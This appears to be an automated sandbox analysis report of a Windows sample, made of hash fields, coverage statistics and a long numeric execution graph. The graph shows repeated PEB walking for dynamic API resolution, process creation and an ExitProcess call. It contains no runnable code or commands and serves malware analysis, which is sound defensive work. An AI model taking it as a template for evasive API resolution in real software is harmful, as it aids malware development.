                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                      • Opcode ID: e9259afd95ecc2c92e8dd6f06ea136959e9fbe127d4e0c2a6fb1143f2c8e1751
                                                                                                                                                                                      • Instruction ID: 6c423a5a3dcaa4ebfb79b600927cc9e9c868f6b7ceb13c1ec4efc67adf3e0bed
                                                                                                                                                                                      • Opcode Fuzzy Hash: e9259afd95ecc2c92e8dd6f06ea136959e9fbe127d4e0c2a6fb1143f2c8e1751
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0841677290010AEFCF02CF94D890AEE7BB9BF48308F28849AFA0966650D335D951DF50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                      Total number of Nodes:1050
                                                                                                                                                                                      Total number of Limit Nodes:5

                                                                                                                                                                                      Graph

                                                                                                                                                                                      execution_graph 3932 2fd567f 3933 2fd5739 3932->3933 3934 2fd5760 3932->3934 3938 2feed95 3933->3938 3949 2fef32b 3938->3949 3939 2fef52b 3962 2ff06ef 3939->3962 3942 2fd574c 3942->3934 3951 2fdf3f7 3942->3951 3947 2ff0ad3 GetPEB 3947->3949 3949->3939 3949->3942 3949->3947 3950 2fe2eed GetPEB 3949->3950 3954 2fde259 3949->3954 3958 2fe0207 3949->3958 3972 2fd6617 3949->3972 3975 2fd24aa 3949->3975 3979 2ff06a6 3949->3979 3983 2fd3965 3949->3983 3950->3949 3952 2fee399 GetPEB 3951->3952 3953 2fdf49a ExitProcess 3952->3953 3953->3934 3955 2fde27f 3954->3955 3987 2fee399 3955->3987 3959 2fe0224 3958->3959 3960 2fee399 GetPEB 3959->3960 3961 2fe02da lstrcmpiW 3960->3961 3961->3949 3963 2ff071d 3962->3963 3964 2fd3965 GetPEB 3963->3964 3965 2ff098a 3964->3965 4017 2fe9100 3965->4017 3967 2ff09c7 3968 2ff09d2 3967->3968 4021 2fe9038 3967->4021 3968->3942 3971 2fe9038 GetPEB 3971->3968 3973 2fee399 GetPEB 3972->3973 3974 2fd66ba 3973->3974 3974->3949 3976 2fd24c7 3975->3976 4025 2fd23ef 3976->4025 3980 2ff06ca 3979->3980 4029 2fddfb1 3980->4029 3984 2fd397d 3983->3984 4032 2fd5821 3984->4032 3988 2fde323 3987->3988 3989 2fee43d 3987->3989 3988->3949 3993 2fd89e3 3989->3993 3991 2fee450 3996 2fd66c3 3991->3996 4000 2fe4315 GetPEB 3993->4000 3995 2fd8a8b 3995->3991 3997 2fd66de 3996->3997 3999 2fd6790 3997->3999 4001 2ff35e3 3997->4001 3999->3988 4000->3995 4002 2ff3739 4001->4002 4009 2fd6560 4002->4009 4005 2ff3780 4007 2ff37ad 4005->4007 4008 2fd66c3 GetPEB 4005->4008 4007->3999 4008->4007 4010 2fd6576 4009->4010 4011 2fee399 GetPEB 4010->4011 4012 2fd660c 4011->4012 4012->4005 4013 2ff308c 4012->4013 4014 2ff30a3 4013->4014 4015 2fee399 GetPEB 4014->4015 4016 2ff313d 4015->4016 4016->4005 4018 2fe913f 4017->4018 4019 2fee399 GetPEB 4018->4019 4020 2fe91da CreateProcessW 4019->4020 4020->3967 4022 2fe904b 4021->4022 4023 2fee399 GetPEB 4022->4023 4024 2fe90f4 4023->4024 4024->3971 4026 2fd2416 4025->4026 4027 2fee399 GetPEB 4026->4027 4028 2fd249a 4027->4028 4028->3949 4030 2fee399 GetPEB 4029->4030 4031 2fde057 4030->4031 4031->3949 4033 2fd583c 4032->4033 4036 2fe44f4 4033->4036 4037 2fe450e 4036->4037 4038 2fee399 GetPEB 4037->4038 4039 2fd39bc 4038->4039 4039->3949 4078 2fe13db 4083 2fe198f 4078->4083 4079 2fe9038 GetPEB 4079->4083 4080 2fd24aa GetPEB 4080->4083 4081 2fe1c03 4083->4079 4083->4080 4083->4081 4085 2fe0f17 GetPEB 4083->4085 4087 2fe2d06 GetPEB 4083->4087 4089 2fe0207 2 API calls 4083->4089 4090 2fdf699 4083->4090 4096 2fe302d 4083->4096 4100 2ff2b52 4083->4100 4104 2fe6f53 4083->4104 4085->4083 4087->4083 4089->4083 4091 2fdf6b3 4090->4091 4109 2fdf5e0 4091->4109 4097 2fe3066 4096->4097 4098 2fee399 GetPEB 4097->4098 4099 2fe3115 4098->4099 4099->4083 4101 2ff2b68 4100->4101 4102 2fee399 GetPEB 4101->4102 4103 2ff2c0a 4102->4103 4103->4083 4105 2fdf5e0 GetPEB 4104->4105 4106 2fe7020 4105->4106 4116 2fe4cfd 4106->4116 4110 2fee399 GetPEB 4109->4110 4111 2fdf690 4110->4111 4112 2fdc460 4111->4112 4113 2fdc47b 4112->4113 4114 2fee399 GetPEB 4113->4114 4115 2fdc519 4114->4115 4115->4083 4117 2fe4d1c 4116->4117 4118 2fee399 GetPEB 4117->4118 4119 2fe4db4 4118->4119 4119->4083 4120 2fda3d4 4136 2fda4df 4120->4136 4121 2fd7b46 GetPEB 4121->4136 4125 2fda8cb 4177 2fd7b46 4125->4177 4129 2fda8da 4132 2fdf699 GetPEB 4132->4136 4134 2fdd7e2 GetPEB 4134->4136 4136->4121 4136->4125 4136->4129 4136->4132 4136->4134 4137 2fed4b7 4136->4137 4141 2fdf984 4136->4141 4145 2fe02e9 4136->4145 4149 2ff314a 4136->4149 4152 2fe5b7c 4136->4152 4161 2ff0ad3 4136->4161 4165 2fee70c 4136->4165 4169 2fe2eed 4136->4169 4173 2fe5f7d 4136->4173 4138 2fed4db 4137->4138 4139 2fee399 GetPEB 4138->4139 4140 2fed577 4139->4140 4140->4136 4142 2fdf9b8 4141->4142 4143 2fee399 GetPEB 4142->4143 4144 2fdfa65 4143->4144 4144->4136 4146 2fe0306 4145->4146 4147 2fee399 GetPEB 4146->4147 4148 2fe03b6 4147->4148 4148->4136 4181 2fe03c7 4149->4181 4159 2fe5e24 4152->4159 4154 2fe6f53 GetPEB 4154->4159 4155 2fe5f40 4156 2fe5f5f 4155->4156 4157 2fdf699 GetPEB 4155->4157 4156->4136 4157->4156 4159->4154 4159->4155 4160 2fdf699 GetPEB 4159->4160 4185 2fe6e69 4159->4185 4189 2fe4626 4159->4189 4160->4159 4162 2ff0ae6 4161->4162 4163 2fe6f53 GetPEB 4162->4163 4164 2ff0b76 4163->4164 4164->4136 4164->4164 4166 2fee739 4165->4166 4167 2fee399 GetPEB 4166->4167 4168 2fee7c0 4167->4168 4168->4136 4170 2fe2f00 4169->4170 4171 2fdf699 GetPEB 4170->4171 4172 2fe2f85 4171->4172 4172->4136 4174 2fe5f9c 4173->4174 4175 2fee399 GetPEB 4174->4175 4176 2fe603a 4175->4176 4176->4136 4178 2fd7b59 4177->4178 4179 2fee399 GetPEB 4178->4179 4180 2fd7c06 4179->4180 4180->4129 4182 2fe03f0 4181->4182 4183 2fee399 GetPEB 4182->4183 4184 2fe048e 4183->4184 4184->4136 4186 2fe6e8b 4185->4186 4187 2fee399 GetPEB 4186->4187 4188 2fe6f10 4187->4188 4188->4159 4190 2fe4646 4189->4190 4193 2fd8b96 4190->4193 4194 2fd8baf 4193->4194 4195 2fee399 GetPEB 4194->4195 4196 2fd8c54 4195->4196 4196->4159 4347 2fd5314 4348 2fd53c0 4347->4348 4349 2fdf3f7 2 API calls 4348->4349 4350 2fd53d0 4349->4350 4197 2feb6d2 4208 2feb71b 4197->4208 4200 2fdf699 GetPEB 4200->4208 4201 2feb945 4202 2feb923 4205 2fdf699 GetPEB 4202->4205 4203 2fe6f53 GetPEB 4203->4208 4205->4201 4207 2fe4626 GetPEB 4207->4208 4208->4200 4208->4201 4208->4202 4208->4203 4208->4207 4209 2fd2575 4208->4209 4216 2fd7a7e 4208->4216 4220 2fde336 4208->4220 4227 2ff0c66 4208->4227 4215 2fd259e 4209->4215 4210 2fe6f53 GetPEB 4210->4215 4211 2fd2b32 4214 2fdf699 GetPEB 4211->4214 4212 2fd875d GetPEB 4212->4215 4213 2fd2b30 4213->4208 4214->4213 4215->4210 4215->4211 4215->4212 4215->4213 4217 2fd7a91 4216->4217 4218 2fe4626 GetPEB 4217->4218 4219 2fd7b3e 4218->4219 4219->4208 4223 2fde35c 4220->4223 4221 2fe0824 GetPEB 4221->4223 4222 2fde626 4222->4208 4223->4221 4223->4222 4224 2fe6f53 GetPEB 4223->4224 4225 2fde608 4223->4225 4224->4223 4242 2fe0824 4225->4242 4239 2ff0c99 4227->4239 4229 2ff1955 4270 2fd2cf9 4229->4270 4230 2fe6f53 GetPEB 4230->4239 4234 2ff1953 4234->4208 4235 2fdf699 GetPEB 4235->4239 4237 2ff0ad3 GetPEB 4237->4239 4239->4229 4239->4230 4239->4234 4239->4235 4239->4237 4241 2fe2eed GetPEB 4239->4241 4246 2fdac44 4239->4246 4250 2fec678 4239->4250 4254 2fd92dd 4239->4254 4258 2ff296f 4239->4258 4262 2fd36b6 4239->4262 4266 2fd5894 4239->4266 4241->4239 4243 2fe0841 4242->4243 4244 2fe4626 GetPEB 4243->4244 4245 2fe095a 4244->4245 4245->4222 4247 2fdac66 4246->4247 4248 2fee399 GetPEB 4247->4248 4249 2fdad04 4248->4249 4249->4239 4251 2fec69a 4250->4251 4252 2fee399 GetPEB 4251->4252 4253 2fec75e 4252->4253 4253->4239 4255 2fd9302 4254->4255 4256 2fee399 GetPEB 4255->4256 4257 2fd937c 4256->4257 4257->4239 4259 2ff2985 4258->4259 4260 2fee399 GetPEB 4259->4260 4261 2ff2a19 4260->4261 4261->4239 4263 2fd36e6 4262->4263 4264 2fee399 GetPEB 4263->4264 4265 2fd376d 4264->4265 4265->4239 4267 2fd58be 4266->4267 4268 2fee399 GetPEB 4267->4268 4269 2fd5964 4268->4269 4269->4239 4271 2fd2d0f 4270->4271 4272 2fee399 GetPEB 4271->4272 4273 2fd2db6 4272->4273 4273->4234 4351 2fe670f 4354 2fe6950 4351->4354 4352 2fe6b58 4355 2fe0824 GetPEB 4352->4355 4353 2fe6f53 GetPEB 4353->4354 4354->4352 4354->4353 4356 2fe0824 GetPEB 4354->4356 4357 2fe6b56 4354->4357 4355->4357 4356->4354 4291 2fd3faf 4302 2fd44a9 4291->4302 4292 2fd46e7 4319 2ff2a25 4292->4319 4293 2ff0ad3 GetPEB 4293->4302 4296 2fd46e5 4297 2fe2eed GetPEB 4297->4302 4299 2fde259 GetPEB 4299->4302 4302->4292 4302->4293 4302->4296 4302->4297 4302->4299 4303 2fdf14f 4302->4303 4307 2fe39e4 4302->4307 4311 2feb062 4302->4311 4315 2fd2089 4302->4315 4304 2fdf166 4303->4304 4305 2fee399 GetPEB 4304->4305 4306 2fdf201 4305->4306 4306->4302 4308 2fe3a0b 4307->4308 4309 2fee399 GetPEB 4308->4309 4310 2fe3aa3 4309->4310 4310->4302 4312 2feb08d 4311->4312 4313 2fddfb1 GetPEB 4312->4313 4314 2feb0b2 4313->4314 4314->4302 4316 2fd20bb 4315->4316 4317 2fee399 GetPEB 4316->4317 4318 2fd215c 4317->4318 4318->4302 4320 2ff2a38 4319->4320 4321 2fee399 GetPEB 4320->4321 4322 2ff2adb 4321->4322 4322->4296 4358 2fe5109 4364 2fe5118 4358->4364 4359 2fd3965 GetPEB 4359->4364 4361 2fe5691 4364->4359 4364->4361 4365 2fdf699 GetPEB 4364->4365 4366 2ff1c71 4364->4366 4376 2fed5fe 4364->4376 4394 2fe0a37 4364->4394 4365->4364 4374 2ff1f68 4366->4374 4368 2fe6f53 GetPEB 4368->4374 4369 2ff20d1 4371 2fdf699 GetPEB 4369->4371 4370 2ff20cf 4370->4364 4371->4370 4372 2ff0ad3 GetPEB 4372->4374 4373 2fddfb1 GetPEB 4373->4374 4374->4368 4374->4369 4374->4370 4374->4372 4374->4373 4375 2fe2eed GetPEB 4374->4375 4402 2fd7739 4374->4402 4375->4374 4391 2fedf78 4376->4391 4377 2fe6f53 GetPEB 4377->4391 4378 2fee362 4381 2fdf699 GetPEB 4378->4381 4379 2ff0ad3 GetPEB 4379->4391 4380 2fd54c0 GetPEB 4380->4391 4382 2fee1af 4381->4382 4382->4364 4383 2fee14c 4386 2fd54c0 GetPEB 4383->4386 4384 2fddfb1 GetPEB 4384->4391 4388 2fee161 4386->4388 4387 2fe4626 GetPEB 4387->4391 4407 2fec103 4388->4407 4389 2fe2eed GetPEB 4389->4391 4391->4377 4391->4378 4391->4379 4391->4380 4391->4382 4391->4383 4391->4384 4391->4387 4391->4389 4411 2fde20f 4391->4411 4393 2fe2eed GetPEB 4393->4382 4400 2fe0a5f 4394->4400 4395 2fdf699 GetPEB 4395->4400 4397 2fe0f0a 4397->4364 4399 2fe6f53 GetPEB 4399->4400 4400->4395 4400->4397 4400->4399 4401 2fe4626 GetPEB 4400->4401 4415 2fd4f42 4400->4415 4421 2fe77a7 4400->4421 4401->4400 4403 2fd7757 4402->4403 4404 2fe81b0 GetPEB 4403->4404 4405 2fd7a6b 4403->4405 4406 2fe6f53 GetPEB 4403->4406 4404->4403 4405->4374 4406->4403 4408 2fec11f 4407->4408 4409 2fddfb1 GetPEB 4408->4409 4410 2fec13d 4409->4410 4410->4393 4412 2fde231 4411->4412 4413 2fddfb1 GetPEB 4412->4413 4414 2fde251 4413->4414 4414->4391 4416 2fd4f5f 4415->4416 4417 2fd5119 4416->4417 4418 2ff0c66 GetPEB 4416->4418 4420 2fd5117 4416->4420 4428 2fd67c8 4417->4428 4418->4416 4420->4400 4422 2fe77d6 4421->4422 4423 2fe7d01 4422->4423 4424 2fd938f GetPEB 4422->4424 4426 2fe6f53 GetPEB 4422->4426 4427 2fe7ce7 4422->4427 4425 2fdf699 GetPEB 4423->4425 4424->4422 4425->4427 4426->4422 4427->4400 4429 2fd67f7 4428->4429 4430 2fee399 GetPEB 4429->4430 4431 2fd6892 4430->4431 4431->4420 4323 2fdf4a5 4325 2fdf593 4323->4325 4324 2fdf5d4 4325->4324 4331 2fd54c0 4325->4331 4330 2fe2eed GetPEB 4330->4324 4332 2fd54d2 4331->4332 4333 2fe6f53 GetPEB 4332->4333 4334 2fd5556 4333->4334 4335 2fe7634 4334->4335 4336 2fe764f 4335->4336 4337 2fdf5bc 4336->4337 4339 2fe7e14 4336->4339 4337->4330 4340 2fe7e2d 4339->4340 4341 2fee399 GetPEB 4340->4341 4342 2fe7ece 4341->4342 4342->4336 4040 2fd47e4 4048 2fd47e7 4040->4048 4041 2fde259 GetPEB 4041->4048 4042 2fd24aa GetPEB 4042->4048 4043 2fd4f37 4044 2ff0ad3 GetPEB 4044->4048 4046 2ff06a6 GetPEB 4046->4048 4048->4041 4048->4042 4048->4043 4048->4044 4048->4046 4049 2ff06ef 2 API calls 4048->4049 4050 2fe2eed GetPEB 4048->4050 4052 2fe0f17 4048->4052 4056 2fecc3f 4048->4056 4060 2ff3306 4048->4060 4049->4048 4050->4048 4053 2fe0f2d 4052->4053 4054 2fee399 GetPEB 4053->4054 4055 2fe0fb9 4054->4055 4055->4048 4057 2fecc53 4056->4057 4067 2fdc52a 4057->4067 4059 2fecd63 4059->4048 4062 2ff3327 4060->4062 4064 2ff3543 4062->4064 4065 2ff3555 4062->4065 4070 2fe2d06 4062->4070 4074 2fe4c43 4062->4074 4066 2fe9038 GetPEB 4064->4066 4065->4048 4066->4065 4068 2fee399 GetPEB 4067->4068 4069 2fdc5d1 4068->4069 4069->4059 4071 2fe2d36 4070->4071 4072 2fee399 GetPEB 4071->4072 4073 2fe2dcf 4072->4073 4073->4062 4075 2fe4c66 4074->4075 4076 2fee399 GetPEB 4075->4076 4077 2fe4ce6 4076->4077 4077->4062 4274 2fe0fc5 4275 2fe0f17 GetPEB 4274->4275 4276 2fe11ee 4275->4276 4277 2fe0207 2 API calls 4276->4277 4278 2fe1206 4277->4278 4279 2ff0ad3 GetPEB 4278->4279 4286 2fe1262 4278->4286 4280 2fe121e 4279->4280 4281 2ff06a6 GetPEB 4280->4281 4282 2fe1242 4281->4282 4283 2fe2eed GetPEB 4282->4283 4284 2fe1251 4283->4284 4287 2fd55c0 4284->4287 4288 2fd55d3 4287->4288 4289 2fee399 GetPEB 4288->4289 4290 2fd5674 4289->4290 4290->4286 4432 2fe9902 4449 2fea564 4432->4449 4434 2feae1e 4635 2fdb12e 4434->4635 4441 2feae52 4645 2fec772 4441->4645 4442 2fd60ba GetPEB 4442->4449 4449->4434 4449->4441 4449->4442 4453 2feae1c 4449->4453 4456 2fdf699 GetPEB 4449->4456 4457 2fe8518 GetPEB 4449->4457 4465 2fe2eed GetPEB 4449->4465 4466 2fd5dc3 4449->4466 4474 2fdf022 4449->4474 4478 2ff27e2 4449->4478 4483 2ff0bf1 4449->4483 4486 2fe3abe 4449->4486 4499 2fd635f 4449->4499 4504 2ff37b6 4449->4504 4508 2fe6b91 4449->4508 4516 2fe56a9 4449->4516 4526 2ff2d4f 4449->4526 4535 2fd2176 4449->4535 4542 2fd1df9 4449->4542 4548 2fee7da 4449->4548 4556 2feba18 4449->4556 4567 2fd39c3 4449->4567 4578 2fd196d 4449->4578 4588 2fd8d59 4449->4588 4597 2fe4268 4449->4597 4601 2fece94 4449->4601 4604 2fec145 4449->4604 4608 2feaeae 4449->4608 4613 2fe89da 4449->4613 4624 2fd8112 4449->4624 4456->4449 4457->4449 4465->4449 4467 2fd5ddb 4466->4467 4468 2fdf699 GetPEB 4467->4468 4471 2fd5fed 4467->4471 4473 2fe6f53 GetPEB 4467->4473 4660 2fdbef5 4467->4660 4670 2fe2f8c 4467->4670 4674 2fe469a 4467->4674 4468->4467 4471->4449 4473->4467 4476 2fdf03c 4474->4476 4475 2fd2b7c GetPEB 4475->4476 4476->4475 4477 2fdf14a 4476->4477 4477->4449 4768 2fd8cbc 4478->4768 4484 2fe6f53 GetPEB 4483->4484 4485 2ff0c53 4484->4485 4485->4449 4487 2fe3ffe 4486->4487 4489 2ff0ad3 GetPEB 4487->4489 4491 2fe4243 4487->4491 4494 2fe4241 4487->4494 4496 2fde259 GetPEB 4487->4496 4497 2feb062 GetPEB 4487->4497 4498 2fe2eed GetPEB 4487->4498 4775 2fd7cc1 4487->4775 4779 2fee606 4487->4779 4783 2fe3130 4487->4783 4796 2ff3231 4487->4796 4489->4487 4492 2fd7cc1 GetPEB 4491->4492 4492->4494 4494->4449 4496->4487 4497->4487 4498->4487 4502 2fd647f 4499->4502 4501 2fd654a 4501->4449 4502->4501 4816 2fdd730 4502->4816 4820 2ff28a6 4502->4820 4505 2ff37cf 4504->4505 4506 2fee399 GetPEB 4505->4506 4507 2ff384d 4506->4507 4507->4449 4510 2fe6d84 4508->4510 4511 2ff0ad3 GetPEB 4510->4511 4512 2fe6e5e 4510->4512 4513 2fe0f17 GetPEB 4510->4513 4514 2ff06a6 GetPEB 4510->4514 4515 2fe2eed GetPEB 4510->4515 4824 2fdb7ec 4510->4824 4511->4510 4512->4449 4513->4510 4514->4510 4515->4510 4519 2fe594a 4516->4519 4518 2fde259 GetPEB 4518->4519 4519->4518 4520 2fd7cc1 GetPEB 4519->4520 4521 2fe5a74 4519->4521 4522 2fe6f53 GetPEB 4519->4522 4523 2ff3231 GetPEB 4519->4523 4525 2fe5a72 4519->4525 4851 2ff1987 4519->4851 4520->4519 4524 2fd24aa GetPEB 4521->4524 4522->4519 4523->4519 4524->4525 4525->4449 4534 2ff2f48 4526->4534 4527 2ff3231 GetPEB 4527->4534 4528 2fd7cc1 GetPEB 4528->4534 4529 2ff3072 4532 2fd7cc1 GetPEB 4529->4532 4530 2fdc38f GetPEB 4530->4534 4531 2ff3070 4531->4449 4532->4531 4534->4527 4534->4528 4534->4529 4534->4530 4534->4531 4862 2fd2fcb 4534->4862 4538 2fd22f6 4535->4538 4536 2fd2350 4870 2fd37ad 4536->4870 4537 2fe6f53 GetPEB 4537->4538 4538->4536 4538->4537 4541 2fd234e 4538->4541 4866 2fd8854 4538->4866 4541->4449 4545 2fd1f7e 4542->4545 4546 2fd2054 4545->4546 4547 2fe0f17 GetPEB 4545->4547 4874 2fed58d 4545->4874 4877 2fee478 4545->4877 4546->4449 4547->4545 4550 2feeb52 4548->4550 4551 2fd24aa GetPEB 4550->4551 4552 2fe9038 GetPEB 4550->4552 4554 2fe2d06 GetPEB 4550->4554 4555 2feeb92 4550->4555 4914 2fd921f 4550->4914 4918 2feeccd 4550->4918 4551->4550 4552->4550 4554->4550 4555->4449 4557 2fd8cbc GetPEB 4556->4557 4565 2febda8 4557->4565 4558 2ff0ad3 GetPEB 4558->4565 4559 2febdd7 4922 2fe604e 4559->4922 4560 2ff06a6 GetPEB 4560->4565 4561 2febdf4 4561->4449 4563 2fdc52a GetPEB 4563->4565 4565->4558 4565->4559 4565->4560 4565->4561 4565->4563 4566 2fe2eed GetPEB 4565->4566 4936 2fd8c65 4565->4936 4566->4565 4568 2fd39db 4567->4568 4575 2fd3de7 4568->4575 4576 2fe6f53 GetPEB 4568->4576 4944 2fd6125 4568->4944 4951 2fe710d 4568->4951 4962 2fd9565 4568->4962 4970 2fe1c12 4568->4970 4991 2fed10b 4568->4991 4999 2fde6fd 4568->4999 5011 2fd6bfe 4568->5011 4575->4449 4576->4568 4581 2fd1c4c 4578->4581 4580 2fdf699 GetPEB 4580->4581 4581->4580 4582 2fd1dd8 4581->4582 4584 2fd1dd6 4581->4584 4587 2fd6617 GetPEB 4581->4587 5117 2fd5b78 4581->5117 5121 2fda8e8 4581->5121 5126 2fe2c0a 4581->5126 5130 2fe0969 4582->5130 4584->4449 4587->4581 4591 2fd8ff3 4588->4591 4590 2fd24aa GetPEB 4590->4591 4591->4590 4592 2fd9106 4591->4592 4593 2ff0ad3 GetPEB 4591->4593 4594 2fe604e GetPEB 4591->4594 4595 2ff06a6 GetPEB 4591->4595 4596 2fe2eed GetPEB 4591->4596 5134 2fdaeb9 4591->5134 4592->4449 4593->4591 4594->4591 4595->4591 4596->4591 4598 2fe4278 4597->4598 4599 2fee399 GetPEB 4598->4599 4600 2fe4309 4599->4600 4600->4449 4602 2ff37b6 GetPEB 4601->4602 4603 2fecf25 4602->4603 4603->4449 4607 2fec3fd 4604->4607 4605 2fdc52a GetPEB 4605->4607 4606 2fec4e7 4606->4449 4607->4605 4607->4606 4609 2feaf64 4608->4609 4611 2fe6f53 GetPEB 4609->4611 4612 2feafa6 4609->4612 5144 2fd33a9 4609->5144 4611->4609 4612->4449 4622 2fe8e22 4613->4622 4614 2fe900b 4616 2fe9038 GetPEB 4614->4616 4615 2fd921f GetPEB 4615->4622 4617 2fe9009 4616->4617 4617->4449 4618 2fe2d06 GetPEB 4618->4622 4619 2ff0ad3 GetPEB 4619->4622 4620 2ff06a6 GetPEB 4620->4622 4622->4614 4622->4615 4622->4617 4622->4618 4622->4619 4622->4620 4623 2fe2eed GetPEB 4622->4623 5173 2fd890e 4622->5173 4623->4622 4625 2fd858e 4624->4625 4626 2fd872b 4625->4626 4627 2fdf699 GetPEB 4625->4627 4629 2ff0ad3 GetPEB 4625->4629 4631 2fd8729 4625->4631 4632 2fd92dd GetPEB 4625->4632 4633 2fe6f53 GetPEB 4625->4633 4634 2fe2eed GetPEB 4625->4634 5177 2fe1270 4625->5177 4628 2fd2cf9 GetPEB 4626->4628 4627->4625 4628->4631 4629->4625 4631->4449 4632->4625 4633->4625 4634->4625 4643 2fdb156 4635->4643 4636 2fde259 GetPEB 4636->4643 4637 2fdb7a7 4638 2ff06ef 2 API calls 4637->4638 4639 2fdb7a5 4638->4639 4639->4453 4640 2ff0ad3 GetPEB 4640->4643 4641 2feb062 GetPEB 4641->4643 4643->4636 4643->4637 4643->4639 4643->4640 4643->4641 4644 2fe2eed GetPEB 4643->4644 5181 2fd238a 4643->5181 4644->4643 4648 2fecab9 4645->4648 4647 2ff0ad3 GetPEB 4647->4648 4648->4647 4649 2fecbfb 4648->4649 4650 2ff2d4f GetPEB 4648->4650 4651 2ff06a6 GetPEB 4648->4651 4652 2fecbf9 4648->4652 4656 2fe2eed GetPEB 4648->4656 4659 2fe604e GetPEB 4648->4659 5185 2ff0a0e 4648->5185 5189 2fe4430 4648->5189 5193 2fe04a4 4648->5193 4653 2fe0f17 GetPEB 4649->4653 4650->4648 4651->4648 4652->4453 4654 2fecc18 4653->4654 5201 2fe8849 4654->5201 4656->4648 4659->4648 4666 2fdc19e 4660->4666 4661 2fdc371 4661->4467 4662 2fdc339 4662->4661 4663 2fdf699 GetPEB 4662->4663 4663->4661 4664 2ff0ad3 GetPEB 4664->4666 4665 2fe6f53 GetPEB 4665->4666 4666->4661 4666->4662 4666->4664 4666->4665 4667 2feb062 GetPEB 4666->4667 4669 2fe2eed GetPEB 4666->4669 4678 2fe8518 4666->4678 4667->4666 4669->4666 4671 2fe3028 4670->4671 4672 2fe3009 4670->4672 4671->4467 4672->4671 4673 2fdf699 GetPEB 4672->4673 4673->4672 4675 2fe46b3 4674->4675 4682 2fd5166 4675->4682 4679 2fe8534 4678->4679 4680 2fe6f53 GetPEB 4679->4680 4681 2fe85b4 4680->4681 4681->4666 4681->4681 4685 2fd5186 4682->4685 4683 2fe6f53 GetPEB 4683->4685 4685->4683 4687 2fd52e7 4685->4687 4688 2fd52e5 4685->4688 4691 2fdf20d 4685->4691 4696 2fdc69b 4685->4696 4714 2fdfbef 4685->4714 4689 2fdf699 GetPEB 4687->4689 4688->4467 4689->4688 4723 2fd5ff7 4691->4723 4694 2fdf699 GetPEB 4695 2fdf31d 4694->4695 4695->4685 4712 2fdd2a9 4696->4712 4697 2fe8907 GetPEB 4697->4712 4699 2fd5ff7 GetPEB 4699->4712 4701 2fdd4d2 4704 2fd2cf9 GetPEB 4701->4704 4703 2ff0ad3 GetPEB 4703->4712 4707 2fdd4f7 4704->4707 4705 2fdd72b 4705->4705 4707->4685 4709 2fd92dd GetPEB 4709->4712 4711 2fe4626 GetPEB 4711->4712 4712->4697 4712->4699 4712->4701 4712->4703 4712->4705 4712->4709 4712->4711 4713 2fe2eed GetPEB 4712->4713 4727 2fe3927 4712->4727 4731 2fdf7f4 4712->4731 4735 2fe132d 4712->4735 4739 2fef561 4712->4739 4752 2fdad17 4712->4752 4756 2fe703f 4712->4756 4713->4712 4722 2fe0056 4714->4722 4715 2fe01d8 4716 2fd2cf9 GetPEB 4715->4716 4717 2fe01d6 4716->4717 4717->4685 4718 2ff0ad3 GetPEB 4718->4722 4719 2fd92dd GetPEB 4719->4722 4720 2fdf7f4 GetPEB 4720->4722 4721 2fe2eed GetPEB 4721->4722 4722->4715 4722->4717 4722->4718 4722->4719 4722->4720 4722->4721 4724 2fd600a 4723->4724 4725 2fee399 GetPEB 4724->4725 4726 2fd60ae 4725->4726 4726->4694 4728 2fe3943 4727->4728 4729 2fee399 GetPEB 4728->4729 4730 2fe39cf 4729->4730 4730->4712 4732 2fdf827 4731->4732 4733 2fee399 GetPEB 4732->4733 4734 2fdf8ba 4733->4734 4734->4712 4736 2fe1346 4735->4736 4737 2fee399 GetPEB 4736->4737 4738 2fe13cd 4737->4738 4738->4712 4741 2ff0155 4739->4741 4740 2fd2cf9 GetPEB 4740->4741 4741->4740 4742 2ff0ad3 GetPEB 4741->4742 4743 2ff05bf 4741->4743 4745 2fdf699 GetPEB 4741->4745 4746 2fd5894 GetPEB 4741->4746 4747 2fe6f53 GetPEB 4741->4747 4748 2fd92dd GetPEB 4741->4748 4749 2fdf14f GetPEB 4741->4749 4751 2fe2eed GetPEB 4741->4751 4760 2fec50b 4741->4760 4764 2fd386e 4741->4764 4742->4741 4743->4712 4745->4741 4746->4741 4747->4741 4748->4741 4749->4741 4751->4741 4753 2fdad4e 4752->4753 4754 2fee399 GetPEB 4753->4754 4755 2fdade0 4754->4755 4755->4712 4757 2fe705e 4756->4757 4758 2fee399 GetPEB 4757->4758 4759 2fe70f8 4758->4759 4759->4712 4761 2fec543 4760->4761 4762 2fee399 GetPEB 4761->4762 4763 2fec5d1 4762->4763 4763->4741 4765 2fd389f 4764->4765 4766 2fee399 GetPEB 4765->4766 4767 2fd3948 4766->4767 4767->4741 4769 2fee399 GetPEB 4768->4769 4770 2fd8d50 4769->4770 4771 2fdbe3f 4770->4771 4772 2fdbe55 4771->4772 4773 2fee399 GetPEB 4772->4773 4774 2fdbee6 4773->4774 4774->4449 4776 2fd7cd4 4775->4776 4777 2fee399 GetPEB 4776->4777 4778 2fd7d7c 4777->4778 4778->4487 4780 2fee648 4779->4780 4781 2fee399 GetPEB 4780->4781 4782 2fee6e6 4781->4782 4782->4487 4790 2fe315f 4783->4790 4784 2fdf699 GetPEB 4784->4790 4786 2fe36f9 4786->4487 4788 2fe6f53 GetPEB 4788->4790 4790->4784 4790->4786 4790->4788 4791 2fd7cc1 GetPEB 4790->4791 4792 2fe36dc 4790->4792 4795 2fdc52a GetPEB 4790->4795 4800 2ff2398 4790->4800 4804 2fdc38f 4790->4804 4808 2ff1bb6 4790->4808 4812 2fd53d6 4790->4812 4791->4790 4794 2fdf699 GetPEB 4792->4794 4794->4786 4795->4790 4797 2ff324a 4796->4797 4798 2fee399 GetPEB 4797->4798 4799 2ff32f7 4798->4799 4799->4487 4801 2ff23d9 4800->4801 4802 2fee399 GetPEB 4801->4802 4803 2ff245d 4802->4803 4803->4790 4805 2fdc3a8 4804->4805 4806 2fee399 GetPEB 4805->4806 4807 2fdc44f 4806->4807 4807->4790 4809 2ff1bdf 4808->4809 4810 2fee399 GetPEB 4809->4810 4811 2ff1c5b 4810->4811 4811->4790 4813 2fd53ef 4812->4813 4814 2fee399 GetPEB 4813->4814 4815 2fd54af 4814->4815 4815->4790 4817 2fdd749 4816->4817 4818 2fee399 GetPEB 4817->4818 4819 2fdd7d7 4818->4819 